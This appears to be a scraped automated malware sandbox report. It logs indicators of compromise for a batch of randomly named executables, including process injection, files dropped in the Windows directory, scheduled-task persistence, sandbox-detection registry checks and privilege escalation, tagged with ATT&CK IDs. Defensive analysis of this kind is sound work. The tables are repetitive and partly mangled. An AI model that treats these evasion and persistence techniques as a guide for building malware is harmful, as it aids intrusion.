Processes:

axzyo4HCwZKUGcUxPBCfRQjA.exeeBNdby7_U4k6msKv3eTB5mye.exe

pid process

1824 axzyo4HCwZKUGcUxPBCfRQjA.exe
2072 eBNdby7_U4k6msKv3eTB5mye.exe

description	ioc	process
File created	C:\Windows\system32\GroupPolicy\gpt.ini	Install.exe

pid	process
1824	axzyo4HCwZKUGcUxPBCfRQjA.exe
2072	eBNdby7_U4k6msKv3eTB5mye.exe

Suspicious use of SetThreadContext 4 IoCs

Processes:

JeysQhYz31CQLdtBWLpMqzAz.exeL84ksia5G66Ptl7obzFS__8v.exexjslbbfw.exeqhKDniWI2KmSmu8DUSRryMd9.exe

description	pid	process	target process
PID 3956 set thread context of 868	3956	JeysQhYz31CQLdtBWLpMqzAz.exe	AppLaunch.exe
PID 4088 set thread context of 4392	4088	L84ksia5G66Ptl7obzFS__8v.exe	L84ksia5G66Ptl7obzFS__8v.exe
PID 4268 set thread context of 4676	4268	xjslbbfw.exe	svchost.exe
PID 1420 set thread context of 4608	1420	qhKDniWI2KmSmu8DUSRryMd9.exe	qhKDniWI2KmSmu8DUSRryMd9.exe

Drops file in Windows directory 3 IoCs

Processes:

Info.exeschtasks.exe

description	ioc	process
File created	C:\Windows\rss\csrss.exe	Info.exe
File created	C:\Windows\Tasks\booXbIzkEgfNdKvxAC.job	schtasks.exe
File opened for modification	C:\Windows\rss	Info.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 27 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
4344	3224	WerFault.exe	rundll32.exe
4388	220	WerFault.exe	9o6imfdYedGqn3wjzwGuuvez.exe
1992	4692	WerFault.exe	2dMnD2VbczUZ6UZsrLHzJUre.exe
2496	3896	WerFault.exe	g2LZs1MbQFfqzFtPxl3zHnDF.exe
4180	4304	WerFault.exe	H0n6Q_XzF3J2qEuqprygBUIR.exe
768	220	WerFault.exe	9o6imfdYedGqn3wjzwGuuvez.exe
2740	4692	WerFault.exe	2dMnD2VbczUZ6UZsrLHzJUre.exe
4776	4392	WerFault.exe
2768	3896	WerFault.exe	g2LZs1MbQFfqzFtPxl3zHnDF.exe
4688	1204	WerFault.exe	xAyGsfpDFb33zy_PxKbzrrni.exe
1744	1984	WerFault.exe	7bNjlyoO2Feob3nuVN4b8BCU.exe
4576	4304	WerFault.exe	H0n6Q_XzF3J2qEuqprygBUIR.exe
2312	4304	WerFault.exe	H0n6Q_XzF3J2qEuqprygBUIR.exe
4144	3148	WerFault.exe	l36_kCSX2CHi4f6qqS_AsMJ3.exe
4464	4304	WerFault.exe	H0n6Q_XzF3J2qEuqprygBUIR.exe
2212	4304	WerFault.exe	H0n6Q_XzF3J2qEuqprygBUIR.exe
4072	4268	WerFault.exe	xjslbbfw.exe
4396	2472	WerFault.exe	Installation.exe
3544	4304	WerFault.exe	H0n6Q_XzF3J2qEuqprygBUIR.exe
216	4304	WerFault.exe	H0n6Q_XzF3J2qEuqprygBUIR.exe
4140	4304	WerFault.exe	H0n6Q_XzF3J2qEuqprygBUIR.exe
3708	1204	WerFault.exe	xAyGsfpDFb33zy_PxKbzrrni.exe
4728	1204	WerFault.exe	xAyGsfpDFb33zy_PxKbzrrni.exe
3452	1204	WerFault.exe	xAyGsfpDFb33zy_PxKbzrrni.exe
1552	1204	WerFault.exe	xAyGsfpDFb33zy_PxKbzrrni.exe
2496	1204	WerFault.exe	xAyGsfpDFb33zy_PxKbzrrni.exe
1776	1204	WerFault.exe	xAyGsfpDFb33zy_PxKbzrrni.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

pub2.exe

description	ioc	process
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	pub2.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	pub2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	pub2.exe

Checks processor information in registry 2 TTPs 35 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

xAyGsfpDFb33zy_PxKbzrrni.exeb9cac397-d7eb-428c-b4ed-62df56e0e335.exe0BsqeDtyBSSUybevCqcCZH0Z.exeeui4rr46HDk2ShlpjL9iJ6bo.exedada.exelDdS1WMJPF4UAl19nBGTj0mP.exe

description	ioc	process
Key value enumerated	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	xAyGsfpDFb33zy_PxKbzrrni.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Previous Update Revision	xAyGsfpDFb33zy_PxKbzrrni.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Status	xAyGsfpDFb33zy_PxKbzrrni.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Configuration Data	xAyGsfpDFb33zy_PxKbzrrni.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	b9cac397-d7eb-428c-b4ed-62df56e0e335.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	0BsqeDtyBSSUybevCqcCZH0Z.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Configuration Data	xAyGsfpDFb33zy_PxKbzrrni.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Platform Specific Field 1	xAyGsfpDFb33zy_PxKbzrrni.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Component Information	xAyGsfpDFb33zy_PxKbzrrni.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Update Status	xAyGsfpDFb33zy_PxKbzrrni.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	eui4rr46HDk2ShlpjL9iJ6bo.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	xAyGsfpDFb33zy_PxKbzrrni.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	xAyGsfpDFb33zy_PxKbzrrni.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString	xAyGsfpDFb33zy_PxKbzrrni.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	dada.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Previous Update Revision	xAyGsfpDFb33zy_PxKbzrrni.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	xAyGsfpDFb33zy_PxKbzrrni.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	0BsqeDtyBSSUybevCqcCZH0Z.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	lDdS1WMJPF4UAl19nBGTj0mP.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	xAyGsfpDFb33zy_PxKbzrrni.exe
Key value enumerated	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1	xAyGsfpDFb33zy_PxKbzrrni.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Update Revision	xAyGsfpDFb33zy_PxKbzrrni.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information	xAyGsfpDFb33zy_PxKbzrrni.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\FeatureSet	xAyGsfpDFb33zy_PxKbzrrni.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	xAyGsfpDFb33zy_PxKbzrrni.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	eui4rr46HDk2ShlpjL9iJ6bo.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1	xAyGsfpDFb33zy_PxKbzrrni.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	xAyGsfpDFb33zy_PxKbzrrni.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	xAyGsfpDFb33zy_PxKbzrrni.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0	b9cac397-d7eb-428c-b4ed-62df56e0e335.exe
Key enumerated	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor	xAyGsfpDFb33zy_PxKbzrrni.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	dada.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor	xAyGsfpDFb33zy_PxKbzrrni.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Identifier	xAyGsfpDFb33zy_PxKbzrrni.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	lDdS1WMJPF4UAl19nBGTj0mP.exe

Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

1936 schtasks.exe
2904 schtasks.exe
1336 schtasks.exe
928 schtasks.exe
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

4060 timeout.exe
Enumerates processes with tasklist 1 TTPs 2 IoCs

Process Discovery
T1057

Processes:

tasklist.exetasklist.exe

pid process

1020 tasklist.exe
4912 tasklist.exe

pid	process
1936	schtasks.exe
2904	schtasks.exe
1336	schtasks.exe
928	schtasks.exe

pid	process
4060	timeout.exe

pid	process
1020	tasklist.exe
4912	tasklist.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

Install.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe

Kills process with taskkill 3 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exe

pid process

5028 taskkill.exe
4436 taskkill.exe
4072 taskkill.exe

pid	process
5028	taskkill.exe
4436	taskkill.exe
4072	taskkill.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

Info.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-271 = "Greenwich Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-492 = "India Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-385 = "Namibia Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-741 = "New Zealand Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-601 = "Taipei Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-691 = "Tasmania Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2891 = "Sudan Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-462 = "Afghanistan Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-732 = "Fiji Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-32 = "Mid-Atlantic Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-191 = "Mountain Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1932 = "Russia TZ 11 Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-562 = "SE Asia Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-451 = "Caucasus Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-292 = "Central European Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-411 = "E. Africa Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-672 = "AUS Eastern Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-722 = "Central Pacific Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-162 = "Central Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2341 = "Haiti Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2872 = "Magallanes Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-721 = "Central Pacific Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-52 = "Greenland Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2841 = "Saratov Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-591 = "Malay Peninsula Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-282 = "Central Europe Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-501 = "Nepal Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2322 = "Sakhalin Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2491 = "Aus Central W. Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-3051 = "Qyzylorda Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2372 = "Easter Island Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1822 = "Russia TZ 1 Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1821 = "Russia TZ 1 Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-621 = "Korea Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-365 = "Middle East Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2941 = "Sao Tome Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-742 = "New Zealand Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2061 = "North Korea Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2321 = "Sakhalin Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2892 = "Sudan Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-431 = "Iran Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1411 = "Syria Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-752 = "Tonga Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2752 = "Tomsk Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2182 = "Astrakhan Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-982 = "Kamchatka Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1472 = "Magadan Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2772 = "Omsk Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-212 = "Pacific Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1912 = "Russia TZ 10 Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2611 = "Bougainville Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-262 = "GMT Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2791 = "Novosibirsk Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1871 = "Russia TZ 7 Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-3141 = "South Sudan Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-221 = "Alaskan Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-142 = "Canada Central Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-92 = "Pacific SA Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-651 = "AUS Central Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-448 = "Azerbaijan Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-202 = "US Mountain Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-11 = "Azores Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-51 = "Greenland Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-272 = "Greenwich Standard Time"	Info.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

jfiag3g_gg.exepub2.exe

pid process

1708 jfiag3g_gg.exe
1708 jfiag3g_gg.exe
3960 pub2.exe
3960 pub2.exe
8
8
8
8
8
8
8
8
8
8
8
8
8
8
8
8
8
8
8
8
8
8
8
8
8
8
8
8
8
8
8
8
8
8
8
8
8
8
8
8
8
8
8
8
8
8
8
8
8
8
8
8
8
8
8
8
8
8
8
8
Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

pid process

8
Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

pub2.exe

pid process

3960 pub2.exe

pid	process
1708	jfiag3g_gg.exe
1708	jfiag3g_gg.exe
3960	pub2.exe
3960	pub2.exe
8
8
8
8
8
8
8
8
8
8
8
8
8
8
8
8
8
8
8
8
8
8
8
8
8
8
8
8
8
8
8
8
8
8
8
8
8
8
8
8
8
8
8
8
8
8
8
8
8
8
8
8
8
8
8
8
8
8
8
8

pid	process
8

pid	process
3960	pub2.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

KRSetp.exeInstall.exetaskkill.exemd9_1sjm.exeInfo.exesvchost.exeInfo.exe8jmbQb_rh3t2mrKFZwTwUGlq.exe

description	pid	process
Token: SeDebugPrivilege	3752	KRSetp.exe
Token: SeCreateTokenPrivilege	4020	Install.exe
Token: SeAssignPrimaryTokenPrivilege	4020	Install.exe
Token: SeLockMemoryPrivilege	4020	Install.exe
Token: SeIncreaseQuotaPrivilege	4020	Install.exe
Token: SeMachineAccountPrivilege	4020	Install.exe
Token: SeTcbPrivilege	4020	Install.exe
Token: SeSecurityPrivilege	4020	Install.exe
Token: SeTakeOwnershipPrivilege	4020	Install.exe
Token: SeLoadDriverPrivilege	4020	Install.exe
Token: SeSystemProfilePrivilege	4020	Install.exe
Token: SeSystemtimePrivilege	4020	Install.exe
Token: SeProfSingleProcessPrivilege	4020	Install.exe
Token: SeIncBasePriorityPrivilege	4020	Install.exe
Token: SeCreatePagefilePrivilege	4020	Install.exe
Token: SeCreatePermanentPrivilege	4020	Install.exe
Token: SeBackupPrivilege	4020	Install.exe
Token: SeRestorePrivilege	4020	Install.exe
Token: SeShutdownPrivilege	4020	Install.exe
Token: SeDebugPrivilege	4020	Install.exe
Token: SeAuditPrivilege	4020	Install.exe
Token: SeSystemEnvironmentPrivilege	4020	Install.exe
Token: SeChangeNotifyPrivilege	4020	Install.exe
Token: SeRemoteShutdownPrivilege	4020	Install.exe
Token: SeUndockPrivilege	4020	Install.exe
Token: SeSyncAgentPrivilege	4020	Install.exe
Token: SeEnableDelegationPrivilege	4020	Install.exe
Token: SeManageVolumePrivilege	4020	Install.exe
Token: SeImpersonatePrivilege	4020	Install.exe
Token: SeCreateGlobalPrivilege	4020	Install.exe
Token: 31	4020	Install.exe
Token: 32	4020	Install.exe
Token: 33	4020	Install.exe
Token: 34	4020	Install.exe
Token: 35	4020	Install.exe
Token: SeDebugPrivilege	5028	taskkill.exe
Token: SeManageVolumePrivilege	3172	md9_1sjm.exe
Token: SeDebugPrivilege	1744	Info.exe
Token: SeImpersonatePrivilege	1744	Info.exe
Token: SeTcbPrivilege	1576	svchost.exe
Token: SeTcbPrivilege	1576	svchost.exe
Token: SeManageVolumePrivilege	3172	md9_1sjm.exe
Token: SeSystemEnvironmentPrivilege	4372	Info.exe
Token: SeShutdownPrivilege	8
Token: SeCreatePagefilePrivilege	8
Token: SeShutdownPrivilege	8
Token: SeCreatePagefilePrivilege	8
Token: SeManageVolumePrivilege	3172	md9_1sjm.exe
Token: SeBackupPrivilege	1576	svchost.exe
Token: SeRestorePrivilege	1576	svchost.exe
Token: SeBackupPrivilege	1576	svchost.exe
Token: SeRestorePrivilege	1576	svchost.exe
Token: SeShutdownPrivilege	8
Token: SeCreatePagefilePrivilege	8
Token: SeShutdownPrivilege	8
Token: SeCreatePagefilePrivilege	8
Token: SeShutdownPrivilege	8
Token: SeCreatePagefilePrivilege	8
Token: SeShutdownPrivilege	8
Token: SeCreatePagefilePrivilege	8
Token: SeDebugPrivilege	4812	8jmbQb_rh3t2mrKFZwTwUGlq.exe
Token: SeShutdownPrivilege	8
Token: SeCreatePagefilePrivilege	8
Token: SeShutdownPrivilege	8

Suspicious use of FindShellTrayWindow 23 IoCs

Processes:

mysetold.exeAccostarmi.exe.pif

pid	process
216	mysetold.exe
216	mysetold.exe
216	mysetold.exe
216	mysetold.exe
216	mysetold.exe
216	mysetold.exe
216	mysetold.exe
216	mysetold.exe
2284	Accostarmi.exe.pif
8
8
2284	Accostarmi.exe.pif
2284	Accostarmi.exe.pif
8
8
8
8
8
8
8
8
8
8

Suspicious use of SendNotifyMessage 11 IoCs

Processes:

mysetold.exeAccostarmi.exe.pif

pid	process
216	mysetold.exe
216	mysetold.exe
216	mysetold.exe
216	mysetold.exe
216	mysetold.exe
216	mysetold.exe
216	mysetold.exe
216	mysetold.exe
2284	Accostarmi.exe.pif
2284	Accostarmi.exe.pif
2284	Accostarmi.exe.pif

Suspicious use of SetWindowsHookEx 25 IoCs

Processes:

